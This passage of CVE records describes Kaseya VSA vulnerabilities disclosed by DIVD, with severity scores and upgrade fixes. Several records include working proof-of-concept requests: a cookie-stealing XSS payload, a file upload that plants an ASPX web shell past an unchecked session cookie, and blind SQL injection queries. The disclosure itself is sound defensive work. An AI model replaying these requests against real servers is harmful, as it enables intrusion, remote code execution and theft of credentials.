            "baseScore": 9.9,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
            },
            {
              "name": "https://csirt.divd.nl/DIVD-2021-00011",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/DIVD-2021-00011"
            },
            {
              "name": "https://csirt.divd.nl/CVE-2021-30120",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/CVE-2021-30120"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Upgrade to a version above 9.5.6"
          }
        ],
        "source": {
          "advisory": "DIVD-2021-00011",
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-30120",
    "datePublished": "2021-07-09T13:22:17",
    "dateReserved": "2021-04-02T00:00:00",
    "dateUpdated": "2024-08-03T22:24:59.669Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-30119 (GCVE-0-2021-30119)

Vulnerability from nvd – Published: 2021-07-09 13:20 – Updated: 2024-08-03 22:24
Summary
Authenticated reflective XSS in HelpDeskTab/rcResults.asp. The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack. Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>` The same is true for the parameter FileName of /done.asp. Example request: `https://x.x.x.x/done.asp?FileName=";</script><script>alert(1);a="&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078`
CWE
  • n/a
Assigner
References
Credits
Discovered by Wietse Boonstra of DIVD Additional research by Frank Breedijk and Hidde Smit of DIVD

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T22:24:59.199Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/DIVD-2021-00011"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/CVE-2021-30119"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Discovered by Wietse Boonstra of DIVD"
        },
        {
          "lang": "en",
          "value": "Additional research by Frank Breedijk and Hidde Smit of DIVD"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp. The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack. Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e` The same is true for the parameter FileName of /done.asp. Example request: `https://x.x.x.x/done.asp?FileName=\";\u003c/script\u003e\u003cscript\u003ealert(1);a=\"\u0026PathData=\u0026originalName=shell.aspx\u0026FileSize=4388\u0026TimeElapsed=00:00:00.078`"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-04T06:25:17",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/DIVD-2021-00011"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/CVE-2021-30119"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to a version above 9.5.6"
        }
      ],
      "source": {
        "advisory": "DIVD-2021-00011",
        "discovery": "INTERNAL"
      },
      "title": "Authenticated reflective XSS in Kaseya VSA \u003c= v9.5.6",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-30119",
          "STATE": "PUBLIC",
          "TITLE": "Authenticated reflective XSS in Kaseya VSA \u003c= v9.5.6"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Discovered by Wietse Boonstra of DIVD"
          },
          {
            "lang": "eng",
            "value": "Additional research by Frank Breedijk and Hidde Smit of DIVD"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp. The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack. Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e` The same is true for the parameter FileName of /done.asp. Example request: `https://x.x.x.x/done.asp?FileName=\";\u003c/script\u003e\u003cscript\u003ealert(1);a=\"\u0026PathData=\u0026originalName=shell.aspx\u0026FileSize=4388\u0026TimeElapsed=00:00:00.078`"
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
            },
            {
              "name": "https://csirt.divd.nl/DIVD-2021-00011",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/DIVD-2021-00011"
            },
            {
              "name": "https://csirt.divd.nl/CVE-2021-30119",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/CVE-2021-30119"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Upgrade to a version above 9.5.6"
          }
        ],
        "source": {
          "advisory": "DIVD-2021-00011",
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-30119",
    "datePublished": "2021-07-09T13:20:58",
    "dateReserved": "2021-04-02T00:00:00",
    "dateUpdated": "2024-08-03T22:24:59.199Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-30118 (GCVE-0-2021-30118)

Vulnerability from nvd – Published: 2021-07-09 13:19 – Updated: 2024-08-03 22:24
Summary
An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. 
Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.
CWE
  • n/a
Assigner
Credits
Discovered by Wietse Boonstra of DIVD Additional research by Frank Breedijk of DIVD

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T22:24:59.357Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/CVE-2021-30118"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/DIVD-2021-00011"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Discovered by Wietse Boonstra of DIVD"
        },
        {
          "lang": "en",
          "value": "Additional research by Frank Breedijk of DIVD"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring \u0026 Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx\u0026PathData=C%3A%5CKaseya%5CWebPages%5C\u0026__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219\u0026qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 \u003c%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %\u003e \u003c%@ Import namespace=\"System.Web.UI.WebControls\" %\u003e \u003c%@ Import namespace=\"System.Diagnostics\" %\u003e \u003c%@ Import namespace=\"System.IO\" %\u003e \u003c%@ Import namespace=\"System\" %\u003e \u003c%@ Import namespace=\"System.Data\" %\u003e \u003c%@ Import namespace=\"System.Data.SqlClient\" %\u003e \u003c%@ Import namespace=\"System.Security.AccessControl\" %\u003e \u003c%@ Import namespace=\"System.Security.Principal\" %\u003e \u003c%@ Import namespace=\"System.Collections.Generic\" %\u003e \u003c%@ Import namespace=\"System.Collections\" %\u003e \u003cscript runat=\"server\"\u003e private const string password = \"pass\"; // The password ( pass ) private const string style = \"dark\"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); \u003csnip\u003e ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. 
Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-04T06:25:16",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/CVE-2021-30118"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/DIVD-2021-00011"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "SaaS version has been fixed by the vendor.\nUpgrade on-premise to version 9.5.6 or above"
        }
      ],
      "source": {
        "advisory": "DIVD-2021-00011",
        "discovery": "INTERNAL"
      },
      "title": "Unauthenticated Remote Code Execution in Kaseya VSA \u003c v9.5.5",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-30118",
          "STATE": "PUBLIC",
          "TITLE": "Unauthenticated Remote Code Execution in Kaseya VSA \u003c v9.5.5"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Discovered by Wietse Boonstra of DIVD"
          },
          {
            "lang": "eng",
            "value": "Additional research by Frank Breedijk of DIVD"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring \u0026 Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx\u0026PathData=C%3A%5CKaseya%5CWebPages%5C\u0026__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219\u0026qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 \u003c%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %\u003e \u003c%@ Import namespace=\"System.Web.UI.WebControls\" %\u003e \u003c%@ Import namespace=\"System.Diagnostics\" %\u003e \u003c%@ Import namespace=\"System.IO\" %\u003e \u003c%@ Import namespace=\"System\" %\u003e \u003c%@ Import namespace=\"System.Data\" %\u003e \u003c%@ Import namespace=\"System.Data.SqlClient\" %\u003e \u003c%@ Import namespace=\"System.Security.AccessControl\" %\u003e \u003c%@ Import namespace=\"System.Security.Principal\" %\u003e \u003c%@ Import namespace=\"System.Collections.Generic\" %\u003e \u003c%@ Import namespace=\"System.Collections\" %\u003e \u003cscript runat=\"server\"\u003e private const string password = \"pass\"; // The password ( pass ) private const string style = \"dark\"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); \u003csnip\u003e ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. 
Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
            },
            {
              "name": "https://csirt.divd.nl/CVE-2021-30118",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/CVE-2021-30118"
            },
            {
              "name": "https://csirt.divd.nl/DIVD-2021-00011",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/DIVD-2021-00011"
            },
            {
              "name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021",
              "refsource": "CONFIRM",
              "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "SaaS version has been fixed by the vendor.\nUpgrade on-premise to version 9.5.6 or above"
          }
        ],
        "source": {
          "advisory": "DIVD-2021-00011",
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-30118",
    "datePublished": "2021-07-09T13:19:42",
    "dateReserved": "2021-04-02T00:00:00",
    "dateUpdated": "2024-08-03T22:24:59.357Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-30117 (GCVE-0-2021-30117)

Vulnerability from nvd – Published: 2021-07-09 13:18 – Updated: 2024-08-03 22:24
Summary
The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"></link> ----SNIP---- ``` However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed. 
Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP ----- ```
CWE
  • n/a
Assigner
Credits
Discovered by Wietse Boonstra of DIVD; additional research by Frank Breedijk of DIVD

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T22:24:59.631Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Discovered by Wietse Boonstra of DIVD"
        },
        {
          "lang": "en",
          "value": "Additional research by Frank Breedijk of DIVD"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 \u003c!DOCTYPE html\u003e \u003cHTML\u003e \u003cHEAD\u003e \u003ctitle\u003eWhoops.\u003c/title\u003e \u003cmeta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /\u003e \u003clink id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"\u003e\u003c/link\u003e ----SNIP---- ``` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. 
Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 \u003chtml\u003e \u003chead\u003e \u003ctitle\u003eExport Folder\u003c/title\u003e \u003cstyle\u003e ------ SNIP ----- ```"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-04T06:25:15",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
